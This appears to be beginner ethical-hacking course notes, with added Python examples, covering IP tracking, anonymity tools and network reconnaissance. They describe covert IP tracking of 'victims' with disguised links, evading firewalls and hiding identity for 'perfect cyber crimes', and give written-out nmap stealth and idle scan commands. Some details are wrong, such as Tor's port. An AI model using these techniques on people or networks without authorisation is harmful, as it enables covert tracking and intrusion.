What is a hacker?
A hacker is NOT a criminal.
A hacker is:
- Somebody who thinks outside the box
- Wants to test his limits
- Wants to try things that are not in the manual
- Has unlimited curiosity
- Discovers unknown features about technology
- Dedicated to knowledge
- Believes in stretching the limits
- Highly creative
Hackers vs. Crackers
Hackers               | Crackers
Very knowledgeable (both)
Good guy              | Bad guy
Help improve security | Want to cause cyber destruction
Strong ethics         | No ethics
Have prior permission | No prior permission
Job opportunities: banking, telecom, IT/ITeS/BPO/KPOs, e-commerce, military, police, retail industry, etc.
Hacking into a computer is just like breaking into a house.
Steps of a hacker:
1. Identify the victim / information gathering
2. Find a loophole / network reconnaissance
3. Actual attack / hack / break-in
4. Escape without a trace
Identify the victim:
Anatomy of an IP address: An IP address is analogous to your mobile phone number. It is something which uniquely identifies your presence on the internet. It is a 32-bit address which is divided into four 8-bit fields, each containing a number between 1 and 255. By simply studying an IP address, we can reveal a lot of information about the network the victim belongs to.
Different classes of an IP address
Class | Range                         | Network/Host IDs
A     | 0.0.0.0 to 126.255.255.255    | NETWORK.HOST.HOST.HOST
B     | 128.0.0.0 to 191.255.255.255  | NETWORK.NETWORK.HOST.HOST
C     | 192.0.0.0 to 223.255.255.255  | NETWORK.NETWORK.NETWORK.HOST
D     | 224.0.0.0 to 239.255.255.255  | Multicast IP addresses; set aside for special purposes
E     | 240.0.0.0 to 255.255.255.255  | Not in use
For an address XX.YY.AA.BB, the network ID and host ID split as follows:
Class A: XX | YY.AA.BB
Class B: XX.YY | AA.BB
Class C: XX.YY.AA | BB
Special IP addresses:
Use | IP address
Local loopback address | 127.0.0.1
Private IP addresses, to be used for computers inside a private network or LAN |
    Class A network: 10.0.0.0 – 10.255.255.255
    Class B network: 172.16.0.0 – 172.31.255.255
    Class C network: 192.168.0.0 – 192.168.255.255
Converting IP addresses into different formats:
Format      | IP address
Decimal     | 171.67.215.200
Binary      | 10101011.01000011.11010111.11001000
Octal       | 253.103.327.310
Hexadecimal | 00AB.0043.00D7.00C8
Tools: http://www.csgnetwork.com/ipaddconv.html, or the Windows scientific calculator.
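The class table, the private/loopback table and the conversion table above, worked through in code. This is an added example, not part of the original notes; the function names are my own.

```python
# Added example (not from the original notes): classify an IPv4 address the way the
# tables above do (class, network/host split, private and loopback ranges) and render
# it in the decimal, binary, octal and hexadecimal forms of the conversion table.
import ipaddress
from typing import Dict, Optional, Tuple

# Loopback and private ranges exactly as listed in the "Special IP addresses" table.
SPECIAL_RANGES = {
    "loopback": ipaddress.ip_network("127.0.0.0/8"),
    "private class A": ipaddress.ip_network("10.0.0.0/8"),
    "private class B": ipaddress.ip_network("172.16.0.0/12"),
    "private class C": ipaddress.ip_network("192.168.0.0/16"),
}

def ip_class(addr: str) -> str:
    """Classful category from the first octet, following the class table."""
    first = int(addr.split(".")[0])
    if first == 127:
        return "loopback"          # 127.x.x.x sits between the class A and B ranges
    if first <= 126:
        return "A"
    if first <= 191:
        return "B"
    if first <= 223:
        return "C"
    if first <= 239:
        return "D"                 # multicast
    return "E"                     # reserved, not in use

def split_network_host(addr: str) -> Tuple[str, str]:
    """(network ID, host ID): class A keeps 1 octet, B 2 octets, C 3 octets."""
    octets = addr.split(".")
    n = {"A": 1, "B": 2, "C": 3}.get(ip_class(addr))
    if n is None:
        raise ValueError("no network/host split for class D, E or loopback")
    return ".".join(octets[:n]), ".".join(octets[n:])

def special_use(addr: str) -> Optional[str]:
    """Name of the special range the address falls in, or None if it is routable."""
    ip = ipaddress.ip_address(addr)
    for name, net in SPECIAL_RANGES.items():
        if ip in net:
            return name
    return None

def formats(addr: str) -> Dict[str, str]:
    """Per-octet dotted forms, matching the conversion table's layout."""
    octets = [int(o) for o in addr.split(".")]
    return {
        "decimal": addr,
        "binary": ".".join(f"{o:08b}" for o in octets),
        "octal": ".".join(f"{o:o}" for o in octets),
        "hexadecimal": ".".join(f"{o:04X}" for o in octets),
    }

if __name__ == "__main__":
    for a in ("171.67.215.200", "10.3.4.5", "192.168.1.1", "224.0.0.9"):
        print(a, ip_class(a), special_use(a), formats(a)["binary"])
```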
Tracking the victim's IP address
www.spypig.com – used to find out the IP address of the victim by sending a tracking image to the victim's email ID.
http://www.getnotify.com/
http://didtheyreadit.com/
http://www.politemail.com/ – commonly used in the corporate world
http://readnotify.com/ – creates a tracking file such as a Word or PDF file.
How to trace an email back to its sender?
1st technique:
Step 1: Open the email headers (the "Show original" option in Gmail; in Yahoo, Email settings -> Full headers).
Step 2: Analyze the email headers manually (the headers contain the sender's IP address).
2nd technique: analyze the headers automatically using emailtrackerpro (http://www.emailtrackerpro.com/).
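The manual header analysis of the 1st technique, automated over a constructed message. This is an added example, not from the original notes; the hostnames and addresses in the sample are made up.

```python
# Added example (not from the original notes): pull the relay chain out of an email's
# Received: headers. Each mail server prepends a Received: line as the message passes
# through, so the last Received: header in the raw message is the hop closest to the sender.
# Caveat for analysts: a sender can forge Received: lines below the ones added by servers
# you control, so only the hops added by your own or trusted relays are authoritative.
import re
from email import message_from_string
from typing import Dict, List

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# Constructed sample message (hosts and addresses are documentation examples, not real).
SAMPLE = """\
Received: from mx.example.net (mx.example.net [203.0.113.5])
\tby inbox.example.org with ESMTPS id abc123; Tue, 1 Jan 2013 10:00:05 +0000
Received: from mail.example.com ([198.51.100.7])
\tby mx.example.net with ESMTP; Tue, 1 Jan 2013 10:00:03 +0000
Received: from [192.0.2.44] (unknown [192.0.2.44])
\tby mail.example.com with ESMTPA; Tue, 1 Jan 2013 10:00:01 +0000
From: someone@example.com
To: you@example.org
Subject: test

hello
"""

def relay_chain(raw: str) -> List[Dict[str, str]]:
    """Hops from origin to destination, each with 'from', 'by' and 'ip' fields."""
    msg = message_from_string(raw)
    hops = []
    # get_all returns headers top to bottom; reverse so the sender's hop comes first.
    for hdr in reversed(msg.get_all("Received", [])):
        text = " ".join(hdr.split())            # collapse folded continuation lines
        m_from = re.search(r"from\s+(\S+)", text)
        m_by = re.search(r"\bby\s+(\S+)", text)
        m_ip = IPV4.search(text)
        hops.append({
            "from": m_from.group(1) if m_from else "",
            "by": m_by.group(1) if m_by else "",
            "ip": m_ip.group(1) if m_ip else "",
        })
    return hops

def origin_ip(raw: str) -> str:
    """IP of the first hop, i.e. where the message entered the mail system."""
    chain = relay_chain(raw)
    return chain[0]["ip"] if chain else ""

if __name__ == "__main__":
    for i, hop in enumerate(relay_chain(SAMPLE), 1):
        print(f"hop {i}: {hop['from']} ({hop['ip']}) -> {hop['by']}")
```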
3rd technique: http://blasze.com/iplog/
Simply send a crafted link to your friend. Now we have an ORIGINAL URL and a VICTIM URL.
DISGUISED URL: use a URL shortening website such as www.bit.ly or www.goo.gl.
4th technique: www.whatismyipaddress.com
How to find out the victim's IP address using a website?
Step 1: Create your own website/webpage/blog.
Step 2: In the homepage, write Java code to extract the IP address and MAC address of the victim.
Step 3: Invite the victim(s).
5th technique: using chatting software (not a reliable technique, though)
Set up a chat with the victim and run the command below at the DOS prompt:
netstat -n
6th technique: TCPView software http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx
Currports http://www.nirsoft.net/utils/cports.html
How to trace an IP address to its exact geographical location?
http://visualroute.visualware.com/
NeoTrace pro http://neotrace-pro.en.softonic.com/
3d traceroute http://www.d3tr.de/
loriot pro http://www.loriotpro.com/
geospider http://oreware.com/viewprogram.php?prog=22
http://vtrace.pl/
All are online versions of the simple traceroute command.
Ex: tracert www.indiatimes.com
Trace a mobile phone number to its geographical location
http://trace.bharatiyamobile.com/
Tracking stolen smartphone
https://www.lookout.com/
Create a Lookout account and register your device.
Summary
- What to do to be a hacker
- What is IP address
- How to get somebody's IP address
- How to trace the IP address's exact geographic location
- How to track a mobile phone
- How to trace a lost smartphone
Internal and External IP addresses
Introduction to NAT (Network Address Translation)
When the internet was initially created, there was no shortage of IP addresses. However, as internet usage spread, an acute shortage of IP addresses arose worldwide. This led to the emergence of Network Address Translation.
Advantages of NAT: it reduces the need for IP addresses, improves security and makes networks easier to implement.
In a NAT system, nobody from the outside world knows the IP address of an internal system.
- Identity is protected
- No direct connection
In a NAT-enabled system, a person from outside first has to hack into the router before trying to get into the internal system.
NAT works like an office telephone exchange: depending upon the extension number entered, a lookup table is used to route the call to the appropriate internal system.
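The lookup table idea above, as a small simulation of port address translation. This is an added example, not from the original notes; the addresses, port numbers and class names are my own.

```python
# Added example (not from the original notes): a minimal NAT lookup table. Outbound
# packets from the LAN get the router's public address and a fresh public port; replies
# are matched on that port and forwarded to the right internal host; inbound packets with
# no matching entry are dropped, which is why outsiders cannot connect to internal hosts
# directly and never learn their private addresses.
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int

class NatRouter:
    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self.next_port = first_port
        # public port -> (internal ip, internal port, remote ip, remote port)
        self.table: Dict[int, Tuple[str, int, str, int]] = {}

    def outbound(self, pkt: Packet) -> Packet:
        """LAN -> internet: rewrite the source to the public address, recording the mapping."""
        flow = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        for pub_port, entry in self.table.items():
            if entry == flow:                       # existing flow reuses its public port
                return Packet(self.public_ip, pub_port, pkt.dst_ip, pkt.dst_port)
        pub_port = self.next_port
        self.next_port += 1
        self.table[pub_port] = flow
        return Packet(self.public_ip, pub_port, pkt.dst_ip, pkt.dst_port)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """internet -> LAN: only packets matching an existing mapping get through."""
        entry = self.table.get(pkt.dst_port)
        if entry is None:
            return None                             # unsolicited: dropped at the router
        ip, port, remote_ip, remote_port = entry
        if (pkt.src_ip, pkt.src_port) != (remote_ip, remote_port):
            return None                             # wrong remote peer for this mapping
        return Packet(pkt.src_ip, pkt.src_port, ip, port)

if __name__ == "__main__":
    nat = NatRouter("203.0.113.9")                  # constructed public address
    out = nat.outbound(Packet("192.168.1.10", 51000, "198.51.100.1", 80))
    print("outside sees:", out)
    print("reply lands on:", nat.inbound(Packet("198.51.100.1", 80, "203.0.113.9", out.src_port)))
    print("unsolicited:", nat.inbound(Packet("198.51.100.1", 80, "203.0.113.9", 40001)))
```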
How to find out the internal IP address and external IP address?
The internal IP address can be found using:
netstat -n
ipconfig /all
The external IP address can be found at http://whatismyipaddress.com/
How to hide your IP address? By using a proxy server.
http://www.anonymizer.ru – online tool/web proxy
Most of the Russian proxy websites are free.
None of them maintain any record or log files.
http://samair.ru/proxy/
http://www.hidemyass.com/ – uses URL encoding so that "facebook" does not appear in the URL.
Torrents:
How are torrents blocked?
- Disabling torrent clients. Solution: http://www.bitlet.org/
- Blocking download of files with the .torrent extension. Solution: http://www.torrent2exe.com/ and http://txtor.dwerg.net/
The perfect cyber crimes are committed by effectively hiding your presence on the internet. Your presence on the internet can be spoofed or tricked by hiding your IP address as well as by hiding your system's MAC address, plus with a lethal technique called war driving.
Difference between IP address and MAC address
IP address | MAC address
Given by ISP/network | Given by the manufacturer, and it is static
2 types: static IP address and dynamic IP address | Your hardware Network Interface Card (NIC), such as an ethernet card, wifi card, bluetooth, etc., has its own unique MAC address
DOS command to get your internal IP address: ipconfig /all | DOS command to get the respective MAC addresses: getmac
To get your external IP address, open your web browser and go to http://whatismyipaddress.com/ |
The perfect cyber crimes are committed by:
Proxy bouncing – IP hiding or IP spoofing (Ultrasoft)
MAC spoofing – (MACAddressChanger, MacMakeUp (doesn't work on Windows XP), MadMacs, EtherChange, BWmachak)
War driving – driving on the streets with a laptop and scanning for unprotected wifi networks (inSSIDer, NetStumbler, Kismet, AirSnort and war chalking)
Onion routing protocol – provides anonymous, secure, encrypted access to the internet. Ex: TOR
How is TOR better than proxy servers?
TOR is available as a free download from http://www.torproject.org.in/
How to unblock TOR?
- Change the name of the downloaded TOR exe file
- In TOR's proxy settings, change the default port number
- Add bridge relay server URLs to TOR from https://bridges.torproject.org/
Bridge relays (or "bridges" for short) are Tor relays that aren't listed in the main directory. Since there is no complete public list of them, even if your ISP is filtering connections to all the known Tor relays, they probably won't be able to block all the bridges.
In case https://bridges.torproject.org/ is blocked, another way to find public bridge addresses is to send mail to bridges@torproject.org with the line "get bridges" by itself in the body of the mail. However, so we can make it harder for an attacker to learn lots of bridge addresses, you must send this request from an email address at one of the following domains:
- gmail.com
- yahoo.com
Types of proxy servers – SOCKS and HTTP
HTTP proxy servers allow you to bypass filtering mechanisms and access blocked content. The user sends an HTTP request to the proxy server, which then reads the Host header in the HTTP request, connects to the target server and transmits back whatever data the server sends. Usually, it works only with HTTP apps. Ex: anonymizer.com
SOCKS proxy servers also allow you to bypass filtering mechanisms and access blocked content. SOCKS is a protocol that transmits data between source and destination via a proxy server without reading any of the contents. Hence it works with all protocols like TCP, UDP, etc. and will allow you to use all applications (mail, browsing, downloading files, etc.). Ex: TOR
TOR works on port number 9051.
Using TOR, you can hide yourself in Skype or any other instant messenger. There are 2 ways to do this:
- Connect the application to TOR
- Connect the application to a proxy
Both cases require an IP address and port number.
Go to Skype -> Tools -> Options -> Connection settings -> Proxy.
Give the proxy IP as 127.0.0.1 and port number 9051.
Tools:
Multiproxy (http://multiproxy.org/multiproxy.htm) – allows you to keep all proxies in the same session. It supports both HTTP and SOCKS. You just need to feed this software with the proxy servers.
SocksChain http://ufasoft.com/socks/ – connects you to a chain of SOCKS or HTTP proxies (proxy bond)
ProxyFire http://www.proxyfire.net/
Ultrasurf https://ultrasurf.us/ – anonymous browsing from your pendrive. It encrypts the connection, hides your IP and unblocks stuff. You can even configure a proxy inside Ultrasurf if your college/organization requires a proxy server to connect to.
Virtual Private Network (VPN)
A VPN is a group of computers connected privately through a public network like the Internet. Usually VPN services give you an encrypted, secure and anonymous communication channel. Popular VPN services are: HideMyAss, IPVanish, StrongVPN, BoxVPN, 12VPN and GoTrusted.
A VPN is like a proxy but in a private network. If Ultrasurf/SOCKS or proxy services don't work as expected, a VPN service is used. VPN servers, like proxy servers, can be in different parts of the world. These servers provide better speed than proxy servers.
VPNs are used to access blocked videos on the Internet. Ex: http://www.hidemyass.com/vpn/
HTTP tunneling
Assume that inside your network, FTP and some websites/torrents are blocked by your firewall. But no firewall blocks all traffic. HTTP tunneling disguises blocked traffic as regular/allowed HTTP traffic. Let us assume that in your college/company, the FTP protocol (port 21) is blocked or torrents are blocked. The firewall only allows HTTP traffic on port 80; all other ports are blocked. It is possible to encapsulate FTP or torrent traffic inside the HTTP protocol and bypass the firewall.
Step 1: Install the HTTP tunneling server software on your home or outside computer that has unrestricted access.
Step 2: Install the HTTP tunneling client software on your college/office computer that has restricted access.
Step 3: Now your connection diagram is as follows:
YOU -> FTP or torrent software -> HTTP tunneling client (sends the FTP or torrent traffic encapsulated in the HTTP protocol via port 80 to bypass the firewall) -> HTTP tunneling server on the home computer -> FTP or torrent destination
Now you can use the college computer to access everything on your home network, including unrestricted internet. Ex: Tunnelizer, HTTPort and HTTPTunnel are good HTTP tunneling tools.
Super Network Tunnel (http://www.networktunnel.net/) is a commercial tool to perform 2-way HTTP tunneling:
Home network <-> college network
Some cool stuff:
PSIPHON (http://psiphon.ca/)
Proxy Workbench (http://proxyworkbench.com/)
Reverse text: http://www.textmechanic.com/
Upside down text (http://www.upsidedowntext.com/)
People hacking:
Whatever we do online is tracked by some website.
http://www.pipl.com/
http://www.spokeo.com/
http://www.anywho.com/
http://www.intelius.com/
Google Maps street view
Google Earth satellite view
Network reconnaissance and information gathering
2nd step of hacking
Network reconnaissance is the process of finding out as much information about the victim as possible. Typically an attacker is trying to find out the following about the victim:
- Whether the victim is online/offline
- Network topology
- DNS information
- List of open ports
- Names and versions of software running on open ports
- OS details
- Possible security loopholes
Techniques:
PING sweeping, traceroute
DNS related tools
LAN surveyors
Port scanning
Daemon banner grabbing
OS fingerprinting
Security auditing
How to execute the attack
Ping sweeping
Ping is used to check the connectivity between your computer and the remote computer (whether you are online, whether the victim is online and whether there is connectivity between both of you).
Ping is used for Denial of Service (DoS) attacks and for OS and firewall detection purposes.
Popular sweeping tools are nmap (http://nmap.org/) and http://ping.eu/
Ping using Nmap:
nmap -sn -v www.google.com
(-sn means no port scan)
Ping by bypassing the firewall:
nmap -sn -v -Pn www.google.com
Instead of using ICMP echo requests, it connects to port 80.
-sn: perform ping. -v: verbose mode (gives you detailed information about what it is doing).
ICMP echo requests/replies can easily be blocked by a firewall. Hence, the -Pn option attempts to connect to the website on port 80 of www.google.com.
Ping sweeping allows you to ping an entire range of computers:
nmap -sn -v 203.94.1.0-255
Angry IP Scanner – ping sweeping tool
Traceroute
When data packets travel from the source to the destination system, they do not always take the same path. Traceroute is a tool that allows you to trace a path between two systems. Originally it was designed for network troubleshooting, but it is commonly used for:
- OS detection
- Firewall detection
- Network topology information
- Geographical location of the target system
How to guess the operating system running on a remote computer by simply using PING and TRACEROUTE?
Time to live (TTL) is a mechanism that limits the lifespan or lifetime of data in a computer or network. The TTL value gets reduced by one every time a data packet reaches a router. The initial TTL value is determined by the operating system. If I am able to find out the initial TTL value of a data packet sent by the victim, I can guess the operating system running on the victim, since different operating systems have different TTL values.
Final TTL value = Initial TTL value - No. of routers
Steps to know what OS www.altoromutual.com is running (it is legal to hack this URL)
Step 1:
E:\Documents and Settings\SYS>ping www.altoromutual.com
Pinging altoromutual.com [65.61.137.117] with 32 bytes of data:
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=289ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Ping statistics for 65.61.137.117:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 289ms, Maximum = 290ms, Average = 289ms
Inference: Final TTL value = 117
117 = Initial TTL value – No. of router hops
Step 2:
E:\Documents and Settings\SYS>tracert www.altoromutual.com
Tracing route to altoromutual.com [65.61.137.117]
over a maximum of 30 hops:
  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    22 ms    23 ms    25 ms  ABTS-KK-Static-001.228.178.122.airtelbroadband.in [122.178.228.1]
  3    20 ms    21 ms    21 ms  ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217]
  4    20 ms    21 ms    21 ms  AES-Static-025.102.22.125.airtel.in [125.22.102.25]
  5   185 ms   178 ms   176 ms  125.62.187.189
  6   177 ms   178 ms   178 ms  ldn-b2-link.telia.net [213.248.71.17]
  7   177 ms   178 ms   178 ms  ldn-bb2-link.telia.net [80.91.247.26]
  8   290 ms   291 ms   291 ms  nyk-bb2-link.telia.net [80.91.248.254]
  9     *        *        *     Request timed out.
 10     *      290 ms   288 ms  rackspace-ic-127247-dls-bb1.c.telia.net [213.248.88.174]
 11   290 ms   289 ms   291 ms  coreb.dfw1.rackspace.net [74.205.108.52]
 12   291 ms   291 ms   291 ms  core5.dfw1.rackspace.net [74.205.108.27]
 13   290 ms   294 ms   289 ms  67.192.56.19
 14   291 ms   289 ms   289 ms  65.61.137.117
Trace complete.
E:\Documents and Settings\SYS>
Inference: Count the number of hops. Eliminate the 1st entry (the source) and the last entry (the destination), and do not count request timeouts: 11 router hops.
Final TTL value = 117
No. of router hops = 11
117 = Initial TTL value – 11
Initial TTL value = 128
Step 3:
Now Google search for the default TTL values of different operating systems. From the URL http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/, a TTL value of 128 corresponds to some Windows-based operating system running on the victim (www.altoromutual.com).
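The three steps above, automated: read the final TTL from ping output, count hops from tracert output with the notes' counting rule, and cross-check against the common default initial TTLs. This is an added example, not from the original notes; the sample output is trimmed from the session above and the function names are my own.

```python
# Added example (not from the original notes): automate the TTL arithmetic of the steps
# above. The hop count follows the notes' rule (drop the first entry, the last entry and
# timed-out rows); a second method simply rounds the observed TTL up to the nearest common
# default initial TTL, which needs no traceroute at all.
import re
from typing import List, Optional

# Sample output trimmed from the ping/tracert session above (hostnames dropped).
PING_OUTPUT = """\
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
"""
TRACERT_OUTPUT = """\
  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    22 ms    23 ms    25 ms  122.178.228.1
  3    20 ms    21 ms    21 ms  122.166.32.217
  4    20 ms    21 ms    21 ms  125.22.102.25
  5   185 ms   178 ms   176 ms  125.62.187.189
  6   177 ms   178 ms   178 ms  213.248.71.17
  7   177 ms   178 ms   178 ms  80.91.247.26
  8   290 ms   291 ms   291 ms  80.91.248.254
  9     *        *        *     Request timed out.
 10     *      290 ms   288 ms  213.248.88.174
 11   290 ms   289 ms   291 ms  74.205.108.52
 12   291 ms   291 ms   291 ms  74.205.108.27
 13   290 ms   294 ms   289 ms  67.192.56.19
 14   291 ms   289 ms   289 ms  65.61.137.117
Trace complete.
"""

# Typical defaults: 64 for Linux/Unix-like, 128 for Windows, 255 for network gear.
COMMON_INITIAL_TTLS = (64, 128, 255)

def final_ttl(ping_text: str) -> Optional[int]:
    """TTL value from the first 'Reply from' line, or None if absent."""
    m = re.search(r"TTL=(\d+)", ping_text)
    return int(m.group(1)) if m else None

def router_hops(tracert_text: str) -> int:
    """Intermediate routers per the notes' rule: drop source, destination and timeouts."""
    rows: List[str] = [ln for ln in tracert_text.splitlines()
                       if re.match(r"\s*\d+\s", ln)]
    middle = rows[1:-1]
    return sum(1 for ln in middle if "Request timed out" not in ln)

def initial_ttl_from_hops(ttl: int, hops: int) -> int:
    """Final TTL = initial TTL - hops, rearranged."""
    return ttl + hops

def initial_ttl_nearest_default(ttl: int) -> int:
    """Smallest common default that is >= the observed TTL."""
    return next(d for d in COMMON_INITIAL_TTLS if d >= ttl)

def guess_os_family(initial: int) -> str:
    return {64: "Linux/Unix-like", 128: "Windows", 255: "network device"}.get(initial, "unknown")

if __name__ == "__main__":
    ttl = final_ttl(PING_OUTPUT)
    hops = router_hops(TRACERT_OUTPUT)
    print(f"final TTL {ttl}, {hops} hops -> initial {initial_ttl_from_hops(ttl, hops)}")
    print("nearest default:", initial_ttl_nearest_default(ttl), guess_os_family(initial_ttl_nearest_default(ttl)))
```

A hop that times out is still a router, so the hop-counting method can be off by one or more; rounding to the nearest default is the more robust of the two checks.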
Domain Name Server
A DNS lookup is a query sent by a user (browser or IM or email client) to a DNS server
to convert a particular domain name to its respective IP address.
www.whois.net
www.iptools.com
www.betterwhois.com
www.dnsstuff.com
www.dnstools.com
www.zoneedit.com/lookup.html
Port scanning:
Port scanning is the art of scanning a remote target system to obtain a list of open virtual ports on it that are listening for connections. This is usually one of the first few steps every criminal takes.
Popular port scanning tools: nmap, strobe, SuperScan, etc.
It allows a criminal to identify any potential entry points into a target computer. The following covers how to see open ports on some remote computer.
Popular Ports:-
21 FTP
23 Telnet
25 SMTP
53 DNS
80 HTTP
110 POP3
443 SSL/https
513 rlogin
TCP packet format:
Flag types –
SYN == Start a new connection
FIN == End an existing connection
RST == Error notification
ACK == Data received successfully
How are connections established on the Internet?
3-step / 3-way TCP/IP handshake (=====> means "sends")
Step 1: Client (me) =====> SYN packet =====> Host (Google)
Step 2: Host =====> SYN/ACK packet =====> Client
Step 3: Client =====> ACK packet =====> Host
How are connections terminated?
2 steps:
Step 1: Client =====> FIN packet =====> Host
Step 2: Host =====> ACK packet =====> Client
(The reverse also needs to happen.)
It is possible to create your own packets using Colasoft Packet Builder (packet generator) and Komodia Packet Crafter, which are available as free downloads on the internet.
TCP CONNECT port scan / TCP handshake port scan:
This port scan establishes a full 3-way TCP/IP handshake with all ports on the remote system.
Procedure:
ATTACKER sends SYN packet to TARGET
OPEN: TARGET sends back a SYN/ACK packet
CLOSED: TARGET sends back a RST/ACK packet
ATTACKER sends ACK/RST packet back to TARGET
Advantages: very accurate, no countermeasures
Disadvantages: attacker is easily detected/caught
Nmap command:
nmap -sT -p1-100 -Pn www.altoromutual.com
-sT TCP connect port scan
-p port range
Second type of scan, where detection is difficult:
1) TCP SYN port scan / half-open scan / stealth scan
Also known as a half-open scan because only half of the complete 3-way TCP/IP handshake is executed.
ATTACKER sends SYN packet to TARGET
OPEN: TARGET sends back a SYN/ACK packet
No third step (unlike the previous scan). Considered stealthy. Can be detected using PortSentry on the Unix platform (http://sourceforge.net/projects/sentrytools/)
nmap -sS -p1-100 -Pn www.altoromutual.com (-sS is the SYN scan option)
NULL/XMAS port scan – stealthy but unreliable, with varied responses
nmap -sX -p1-100 www.altoromutual.com (all flags set to 1)
nmap -sN -p1-100 www.altoromutual.com (all flags set to 0)
2) IDLE port scan (blind port scanning):
Very useful for the attacker.
It port scans the victim without sending even a single packet to the victim from the attacker's own IP address. Every system has a fragment ID number, which is a 4-digit number that is increased by 1 each time a packet is sent by it.
Step 1: Probe a zombie machine for its fragment ID.
ATTACKER =====> sends SYN/ACK packet =====> ZOMBIE
ZOMBIE =====> sends back a RST packet with fragment ID =====> ATTACKER
Assume the recorded fragment ID = 1012.
Step 2: Send a spoofed SYN packet from the zombie to the victim.
OPEN: Victim sends SYN/ACK to Zombie. Zombie sends back a RST and increases its fragment ID by 1, so it becomes 1013.
CLOSED: Victim sends RST to Zombie, who discards the RST packet and does not change its fragment ID.
Step 3: Probe the fragment ID of the zombie again. If the fragment ID increased by 1, then the port on the victim is open, else it is closed.
nmap -Pn -p 1-100 -sI <ZOMBIE/friend's IP address> www.altoromutual.com
-sI ==> idle port scan
3) ACK port scan / firewall detection scan
nmap -sA -Pn -p 1-100 www.altoromutual.com
This type of scan can be used to determine the presence of a firewall filtering out data packets.
ATTACKER sends ACK packet to TARGET
FIREWALL PRESENT: no response
FIREWALL NOT PRESENT: target sends back RST packet
Other command line port scanning tools: scanline, hping3, etc.
Countermeasures:
- Foolproof countermeasures against port scanning do not exist.
- Close as many ports as possible.
- Filter out certain packets using firewalls, ACLs and other filters, using tools like Scanlogd, BlackICE, Abacus, PortSentry, Snort, etc.
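What the countermeasure tools above actually look for, as detection logic over constructed packet records. This is an added example, not from the original notes; the record format, thresholds and addresses are my own.

```python
# Added example (not from the original notes): detection logic for the scan types
# described above, run over constructed packet records of the kind a sensor (Snort,
# scanlogd, PortSentry) sees. A half-open scan shows up as one source sending SYNs to many
# distinct ports with no handshake completion; NULL/XMAS/FIN probes show up as packets
# whose flags make no sense for a fresh connection.
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed records: (time in seconds, src ip, dst ip, dst port, TCP flag letters).
RECORDS: List[Tuple[float, str, str, int, str]] = [
    (0.0, "198.51.100.7", "192.0.2.10", 80, "S"),
    (0.2, "198.51.100.7", "192.0.2.10", 80, "A"),    # normal client completes handshake
    (1.0, "203.0.113.5", "192.0.2.10", 21, "S"),
    (1.1, "203.0.113.5", "192.0.2.10", 22, "S"),
    (1.2, "203.0.113.5", "192.0.2.10", 23, "S"),
    (1.3, "203.0.113.5", "192.0.2.10", 25, "S"),
    (1.4, "203.0.113.5", "192.0.2.10", 53, "S"),
    (1.5, "203.0.113.5", "192.0.2.10", 80, "S"),
    (1.6, "203.0.113.5", "192.0.2.10", 110, "S"),
    (1.7, "203.0.113.5", "192.0.2.10", 443, "S"),
    (2.0, "203.0.113.5", "192.0.2.10", 80, "A"),     # one handshake finished, rest half-open
    (5.0, "192.0.2.99", "192.0.2.10", 22, ""),       # NULL probe: no flags at all
    (5.1, "192.0.2.99", "192.0.2.10", 22, "FPU"),    # XMAS probe: FIN+PSH+URG
    (5.2, "192.0.2.99", "192.0.2.10", 23, "F"),      # FIN probe with no connection
]

def half_open_scanners(records, window: float = 10.0, min_ports: int = 5) -> Dict[str, int]:
    """Sources with >= min_ports distinct ports SYN'd but never ACK'd inside the window."""
    syn_times: Dict[str, Dict[int, float]] = defaultdict(dict)   # src -> port -> first SYN
    completed: Dict[str, Set[int]] = defaultdict(set)
    for t, src, _dst, port, flags in records:
        if flags == "S":
            syn_times[src].setdefault(port, t)
        elif "A" in flags and "S" not in flags and port in syn_times.get(src, {}):
            completed[src].add(port)                              # third handshake step seen
    result: Dict[str, int] = {}
    for src, ports in syn_times.items():
        pending = [p for p in ports if p not in completed[src]]
        times = sorted(ports.values())
        if len(pending) >= min_ports and times[-1] - times[0] <= window:
            result[src] = len(pending)
    return result

def bogus_flag_probes(records) -> List[Tuple[str, int, str]]:
    """Packets whose flags cannot open a legitimate connection: NULL, XMAS, lone FIN."""
    seen_syn: Set[Tuple[str, int]] = set()
    hits: List[Tuple[str, int, str]] = []
    for _t, src, _dst, port, flags in records:
        if "S" in flags:
            seen_syn.add((src, port))
            continue
        if (src, port) in seen_syn:
            continue                                  # belongs to a real connection
        if flags == "":
            hits.append((src, port, "NULL"))
        elif set("FPU") <= set(flags):
            hits.append((src, port, "XMAS"))
        elif flags == "F":
            hits.append((src, port, "FIN"))
    return hits

if __name__ == "__main__":
    print("half-open scanners:", half_open_scanners(RECORDS))
    print("bogus-flag probes:", bogus_flag_probes(RECORDS))
```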
Daemon banner grabbing
It helps you confirm your guess about the victim's operating system. Once you get to know the list of installed software on the victim's system, the attacker Google searches for vulnerabilities in the installed software.
Daemon banner grabbing is the process of getting useful information about the target system by recording the welcome banners of the daemons running on various ports. It can be used to get the following information about the target system:
o Daemon name and version number
o OS information
o Most important, to identify possible points of entry
nmap -sV -p 1-100 www.altoromutual.com
Scanline:
sl -v -bt 1-100 www.altoromutual.com
Manual technique using PuTTY (Telnet client):
Telnet to port 80 of the victim.
The "Close window on exit" option should be set to "Never".
Type HEAD / HTTP/1.0 and press Enter twice (the blank line ends the request).
You will get the victim's daemon banner as output.
HTTPRecon
http://www.computec.ch/projekte/httprecon/
Countermeasures:
Edit the default daemon message, ensuring critical information is not revealed.
